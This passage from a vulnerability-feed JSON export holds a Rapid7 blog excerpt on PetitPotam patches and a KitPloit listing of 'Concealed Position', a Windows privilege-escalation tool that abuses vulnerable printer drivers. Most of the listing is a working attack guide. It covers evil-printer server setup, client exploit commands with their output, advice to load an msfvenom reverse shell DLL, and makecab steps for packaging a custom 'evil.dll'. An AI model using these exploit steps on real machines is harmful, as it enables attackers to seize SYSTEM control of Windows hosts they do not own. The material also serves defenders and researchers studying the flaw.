You can read Rapid7\u2019s full blog post [here](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>).\n\nOn August 10, 2021, Microsoft released a patch that addresses the PetitPotam NTLM relay attack vector in today's Patch Tuesday. Tracked as [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>), the August 2021 Patch Tuesday security update blocks the affected API calls [OpenEncryptedFileRawA](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>) and [OpenEncryptedFileRawW](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfileraww>) through the LSARPC interface. Windows administrators should prioritize patching domain controllers and will still need to take additional steps listed in [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) to ensure their systems are fully mitigated.\n\n### Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to the vulnerabilities in this post with authenticated vulnerability checks. 
Please note that details haven\u2019t yet been released on CVE-2021-38085 and CVE-2021-36958; therefore, they\u2019re still awaiting analysis and check development.\n\n### Updates\n\n**Pulse Connect Secure CVE-2021-22937** \nOn August 24, 2021, the Cybersecurity & Infrastructure Security Agency (CISA) released [Malware Analysis Report (AR21-236E)](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236e>) which includes indicators of compromise (IOCs) to assist with Pulse Connect Secure investigations.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T17:13:25", "type": "rapid7blog", "title": "Popular Attack Surfaces, August 2021: What You Need to Know", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1048", "CVE-2020-1300", "CVE-2020-1337", "CVE-2020-17001", "CVE-2020-17014", "CVE-2020-8260", "CVE-2021-1675", "CVE-2021-1722", "CVE-2021-22937", "CVE-2021-24077", "CVE-2021-24088", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", 
"CVE-2021-34527", "CVE-2021-35449", "CVE-2021-36942", "CVE-2021-36958", "CVE-2021-38085"], "modified": "2021-08-12T17:13:25", "id": "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "href": "https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2022-04-07T12:01:39", "description": "[](<https://1.bp.blogspot.com/-JMl-654CheQ/YUOLZnQfumI/AAAAAAAAuuQ/JGDFkb4V1iQ5GvRUodx6ZDEecD6q2iZ1gCNcBGAsYHQ/s300/printer_hack.jpeg>)\n\n \n\n\nConcealed Position is a local [privilege escalation](<https://www.kitploit.com/search/label/Privilege%20Escalation> \"privilege escalation\" ) attack against Windows using the concept of \"Bring Your Own Vulnerability\". Specifically, Concealed Position (CP) uses the _as designed_ package point and print logic in Windows that allows a low privilege user to stage and install printer drivers. CP specifically installs drivers with [known vulnerabilities](<https://www.kitploit.com/search/label/Known%20Vulnerabilities> \"known vulnerabilities\" ) which are then exploited to escalate to SYSTEM. 
Concealed Position was first presented at DEF CON 29.\n\n \n\n\n**What exploits are available** \n\n\nConcealed Position offers four exploits - all with equally dumb names:\n\n * ACIDDAMAGE - [CVE-2021-35449](<https://nvd.nist.gov/vuln/detail/CVE-2021-35449> \"CVE-2021-35449\" ) \\- Lexmark Universal Print Driver LPE\n * RADIANTDAMAGE - [CVE-2021-38085](<https://nvd.nist.gov/vuln/detail/CVE-2021-38085> \"CVE-2021-38085\" ) \\- Canon TR150 Print Driver LPE\n * POISONDAMAGE - [CVE-2019-19363](<https://nvd.nist.gov/vuln/detail/CVE-2019-19363> \"CVE-2019-19363\" ) \\- Ricoh PCL6 Print Driver LPE\n * SLASHINGDAMAGE - [CVE-2020-1300](<https://nvd.nist.gov/vuln/detail/CVE-2020-1300> \"CVE-2020-1300\" ) \\- Windows Print Spooler LPE\n\nThe exploits are neat because, besides SLASHINGDAMAGE, they will continue working even after the issues are patched. The only mechanism Windows has to stop users from using old drivers is to revoke the driver's certificate - something that is not(?) historically done.\n\n \n**But which exploit should I use?!** \n\n\nProbably ACIDDAMAGE. RADIANTDAMAGE and POISONDAMAGE are race conditions (to overwrite a DLL) and SLASHINGDAMAGE, hopefully, is patched most everywhere.\n\n \n**How does it work?** \n\n\nConcealed Position has two parts. An evil printer and a client. The client reaches out to the server, grabs a driver, gets the driver stored in the driver store, installs the printer, and exploits the install process. Easy! In MSAPI speak, the attack goes something like this:\n \n \n Stage 1: Stage the driver in the driver store \n client to server: GetPrinterDriver \n server to client: Response with driver \n \n Stage 2: Install the driver from the driver store \n client: InstallPrinterDriverFromPackage \n \n Stage 3: Add a local printer (exploitation stage) \n client: Add printer \n \n\nIt is important to note that SLASHINGDAMAGE doesn't actually work like that though. 
SLASHINGDAMAGE is an implementation of the evil printer attack described at DEFCON 28 (2020) and has long since been patched. I just so happen to enjoy the attack (it sparked the rest of this development) and figured I'd leave the exploit in my evil server... as confusing as that may be.\n\n \n**Is this a Windows vulnerability?** \n\n\nArguably, yes. The driver store is a [\"trusted collection of ... third-party driver packages\"](<https://docs.microsoft.com/en-us/windows-hardware/drivers/install/driver-store> \"trusted collection of ... third-party driver packages\" ) that requires administrator access to modify. Using `GetPrinterDriver` a low-privileged attacker can stage arbitrary drivers into the store. This, to me, crosses a clear security boundary.\n\nMicrosoft seemed to agree when they issued [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481> \"CVE-2021-34481\" ).\n\nAlthough... it's arguable that this is simply a feature of the system and not a [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) at all. It really doesn't matter all that much. An attacker can escalate to SYSTEM on standard Windows installs.\n\n \n**Which versions of Windows are affected by CVE-2021-34481?** \n\n\nAt least Windows 8.1 and above.\n\n \n**How do I use these tools?** \n\n\nSimple! 
So simple there will be many paragraphs to describe it!\n\n \n**CP Server** \n\n\nFirst, let's look at cp_server's command line options:\n \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin>cp_server.exe \n _______ _______ __ _ _______ _______ _______ ___ _______ ______ \n | || || | | || || || _ || | | || | \n | || _ || |_| || || ___|| |_| || | | ___|| _ | \n | || | | || || || |___ | || | | |___ | | | | \n | _|| |_| || _ || _|| ___|| || |___ | ___|| |_| | \n | |_ | || | | || |_ | |___ | _ || || |___ | | \n |_______||_______||_| |__||_______||_______||__| |__||_______||_______||______| \n _______ _______ _______ ___ _______ ___ _______ __ _ \n | || || || | | || | | || | | | \n | _ || _ || _____|| | |_ _|| | | _ || |_| | \n | |_| || | | || |_____ | | | | | | | | | || | \n | ___|| |_| || _____ || | | | | | | |_| || _ | \n | | | | _____| || | | | | | | || | | | \n |___| |_______||_______||___| |___| |___| |_______||_| |__| server! \n \n CLI options: \n -h, --help Display the help message \n -e, --exploit arg The exploit to use \n -c, --cabs arg (=.\\cab_files) The location of the cabinet files \n \n Exploits available: \n ACIDDAMAGE \n POISONDAMAGE \n RADIANTDAMAGE \n SLASHINGDAMAGE \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin> \n \n\nAbove you can see the server requires two options:\n\n 1. The exploit to configure the printer for\n 2. A path to this repositories cab_files (.\\cab_files\\ is the default)\n\nFor example, let's say we wanted to configure an evil printer that would serve up the ACIDDAMAGE driver. 
Just do this:\n \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin>cp_server.exe -e ACIDDAMAGE \n _______ _______ __ _ _______ _______ _______ ___ _______ ______ \n | || || | | || || || _ || | | || | \n | || _ || |_| || || ___|| |_| || | | ___|| _ | \n | || | | || || || |___ | || | | |___ | | | | \n | _|| |_| || _ || _|| ___|| || |___ | ___|| |_| | \n | |_ | || | | || |_ | |___ | _ || || |___ | | \n |_______||_______||_| |__||_______||_______||__| |__||_______||_______||______| \n _______ _______ _______ ___ _______ ___ _______ __ _ \n | || || || | | || | | || | | | \n | _ || _ || _____|| | |_ _|| | | _ || |_| | \n | |_| || | | || |_____ | | | | | | | | | || | \n | ___|| |_| ||_____ || | | | | | | |_| || _ | \n | | | | _____| || | | | | | | || | | | \n |___| |_______||_______||___| |___| |___| |_______||_| |__| server! \n \n [+] Creating temporary space... \n [+] Expanding .\\cab_files\\ACIDDAMAGE\\LMUD1o40.cab \n [+] Pushing into the driver store \n [+] Cleaning up tmp space \n [+] Installing print driver \n [+] Driver installed! \n [+] Installing shared printer \n [+] Shared printer installed! \n [+] Automation Done. \n [!] IMPORTANT MANUAL STEPS! \n [0] In Advanced Sharing Settings, Turn off password protected sharing. \n [1] Ready to go! \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin> \n \n\nAnd that's it, you'll see a new printer on your system:\n \n \n PS C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin> Get-Printer \n \n Name ComputerName Type DriverName PortName Shared Publishe \n d \n ---- ------------ ---- ---------- -------- ------ -------- \n ACIDDAMAGE Local Lexmark Universal v2 LPT1: True False \n CutePDF Writer Local CutePDF Writer v4.0 CPW4: False False \n OneNote for Windows 10 Local Microsoft Software Pri... Microsoft.Of... False False \n Microsoft XPS Document Writer Local Microsoft XPS Document... 
PORTPROMPT: False False \n Microsoft Print to PDF Local Microsoft Print To PDF PORTPROMPT: False False \n Fax Local Microsoft Shared Fax D... SHRFAX: False False \n \n \n PS C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin> \n \n\nNote that there is one manual step that `cp_server` prompts you to do. Because I'm a junk hacker, I couldn't figure out how to programmatically set the \"Advanced Sharing Settings\" -> \"Turn off password protected sharing\". You'll have to do that yourself!\n\nThe process for using `SLASHINGDAMAGE` is a little different. You'll need to first install CutePDF Writer (find the installers in the 3rd party directory). Then run cp_server and _then_ you'll still need to follow a couple of manual steps and reboot.\n\n \n**CP Client** \n\n\nThe client is similarly easy to use. Let's look at it's command line options:\n \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin>cp_client.exe \n _______ _______ __ _ _______ _______ _______ ___ _______ ______ \n | || || | | || || || _ || | | || | \n | || _ || |_| || || ___|| |_| || | | ___|| _ | \n | || | | || || || |___ | || | | |___ | | | | \n | _|| |_| || _ || _|| ___|| || |___ | ___|| |_| | \n | |_ | || | | || |_ | |___ | _ || || |___ | | \n |_______||_______||_| |__||_______||_______||__| |__||_______||_______||______| \n _______ _______ _______ ___ _______ ___ _______ __ _ \n | || || || | | || | | || | | | \n | _ || _ || _____|| | |_ _|| | | _ || |_| | \n | |_| || | | || |_____ | | | | | | | | | || | \n | ___|| |_| || _____ || | | | | | | |_| || _ | \n | | | | _____| || | | | | | | || | | | \n |___| |_______||_______||___| |___| |___| |_______||_| |__| client! \n \n CLI options: \n -h, --help Display the help message \n -r, --rhost arg The remote evil printer address \n -n, --name arg The remote evil printer name \n -e, --exploit arg The exploit to use \n -l, --local No remote printer. Local attack only. 
\n -d, --dll arg Path to user provided DLL to execute. \n \n Exploits available: \n ACIDDAMAGE \n POISONDAMAGE \n RADIANTDAMAGE \n \n\nFirst, I'd like to address the --dll option. The client has an embedded payload that will simply write the C:\\result.txt file. However, users can provide their own DLL via this option. A good example of something you might want to use is an x64 reverse shell produced by msfvenom. But for the rest of this we'll just assume the embedded payload.\n\n`cp_client` has two modes: remote and local. The remote option is the most interesting because it adds the [vulnerable driver](<https://www.kitploit.com/search/label/Vulnerable%20Driver> \"vulnerable driver\" ) to the driver store (thus executing the bring your own print driver vulnerability), so we'll go with that first. Let's say I want to connect back to the evil ACIDDAMAGE printer we configured previously. I just need to provide:\n\n 1. The exploit I want to use\n 2. The evil printer IP address\n 3. The name of the evil shared printer\n\nLike this!\n \n \n C:\\Users\\albinolobster\\Desktop>cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE \n _______ _______ __ _ _______ _______ _______ ___ _______ ______ \n | || || | | || || || _ || | | || | \n | || _ || |_| || || ___|| |_| || | | ___|| _ | \n | || | | || || || |___ | || | | |___ | | | | \n | _|| |_| || _ || _|| ___|| || |___ | ___|| |_| | \n | |_ | || | | || |_ | |___ | _ || || |___ | | \n |_______||_______||_| |__||_______||_______||__| |__||_______||_______||______| \n _______ _______ _______ ___ _______ ___ _______ __ _ \n | || || || | | || | | || | | | \n | _ || _ || _____|| | |_ _|| | | _ || |_| | \n | |_| || | | || |_____ | | | | | | | | | || | \n | ___|| |_ | ||_____ || | | | | | | |_| || _ | \n | | | | _____| || | | | | | | || | | | \n |___| |_______||_______||___| |___| |___| |_______||_| |__| client! \n \n [+] Checking if driver is already installed \n [-] Driver is not available. 
\n [+] Call back to evil printer @ \\\\10.0.0.9\\ACIDDAMAGE \n [+] Staging driver in driver store \n [+] Installing the staged driver \n [+] Driver installed! \n [+] Starting AcidDamage \n [+] Checking if C:\\ProgramData\\Lexmark Universal v2\\ exists \n [-] Target directory doesn't exist. Trigger install. \n [+] Installing printer \n [+] Read in C:\\ProgramData\\Lexmark Universal v2\\Universal Color Laser.gdl \n [+] Searching file contents \n [+] Updating file contents \n [+] Dropping updated gpl \n [+] Dropping Dll.dll to disk \n [+] Staging dll in c:\\tmp \n [+] Installing printer \n [!] Mucho success! \n \n\nThat's it! To execute a local only attack, you just need to provide the exploit:\n \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin>cp_client.exe -l -e ACIDDAMAGE \n _______ _______ __ _ _______ _______ _______ ___ _______ ______ \n | || || | | || || || _ || | | || | \n | || _ || |_| || || ___|| |_| || | | ___|| _ | \n | || | | || || || |___ | || | | |___ | | | | \n | _|| |_| || _ || _|| ___|| || |___ | ___|| |_| | \n | |_ | || | | || |_ | |___ | _ || || |___ | | \n |_______||_______||_| |__||_______||_______||__| |__||_______||_______||______| \n _______ _______ _______ ___ _______ ___ _______ __ _ \n | || || || | | || | | || | | | \n | _ || _ || _____|| | |_ _|| | | _ || |_| | \n | |_| || | | || |_____ | | | | | | | | | || | \n | ___|| |_| ||_____ || | | | | | | |_| || _ | \n | | | | _____| || | | | | | | || | | | \n |___| |_______||_______||___| |___| |___| |_______||_| |__| client! \n \n [+] Checking if driver is already installed \n [+] Driver installed! \n [+] Starting AcidDamage \n [+] Checking if C:\\ProgramData\\Lexmark Universal v2\\ exists \n [-] Target directory doesn't exist. Trigger install. 
\n [+] Installing printer \n [+] Read in C:\\ProgramData\\Lexmark Universal v2\\Universal Color Laser.gdl \n [+] Searching file contents \n [+] Updating file contents \n [+] Dropping updated gpl \n [+] Dropping Dll.dll to disk \n [+] Staging dll in c:\\tmp \n [+] Installing printer \n [!] Mucho success! \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin> \n \n\n \n**Why doesn't the client have a SLASHINGDAMAGE option?** \n\n\n`SLASHINGDAMAGE` doesn't need a special client for exploitation. You can just use the UI or the command line to connect to the remote printer and that's it! Unfortunately, if you want to roll a custom payload you'll need to update the CAB in the cab_files directory. But that's easy. Something like this:\n \n \n echo \u201cevil.dll\u201d \u201c../../evil.dll\u201d > files.txt \n makecab /f files.txt \n move disk1/1.cab exploit.cab \n \n\nIt's probably important to know that the version of `SLASHINGDAMAGE` in the repo drops ualapi.dll into SYSTEM32 and, when executed on reboot, it drops the C:\\result.txt file.\n\n \n**Pull Requests and Bugs** \n\n\nDo you want to submit a pull request or file a bug? Great! I appreciate that, but if you don't provide sufficient details to reproduce a bug or explain why a pull request should be accepted then there is a 100% chance I'll close your issue without comment. I appreciate you, but I'm also pretty busy.\n\n \n**Other things** \n\n\nOne thing to note is that the inject_me dll is actually embedded in the cp_client as a C array. 
If you update inject_me, you'll need to manually update the C array as well (just use xxd to generate the array).\n\n \n \n\n\n**[Download Concealed_Position](<https://github.com/jacob-baines/concealed_position> \"Download Concealed_Position\" )**\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-18T11:30:00", "type": "kitploit", "title": "Concealed Position - Bring Your Own Print Driver Privilege Escalation Tool", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19363", "CVE-2020-1300", "CVE-2021-34481", "CVE-2021-35449", "CVE-2021-38085"], "modified": "2021-09-18T11:30:00", "id": "KITPLOIT:1358590931647264988", "href": "http://www.kitploit.com/2021/09/concealed-position-bring-your-own-print.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}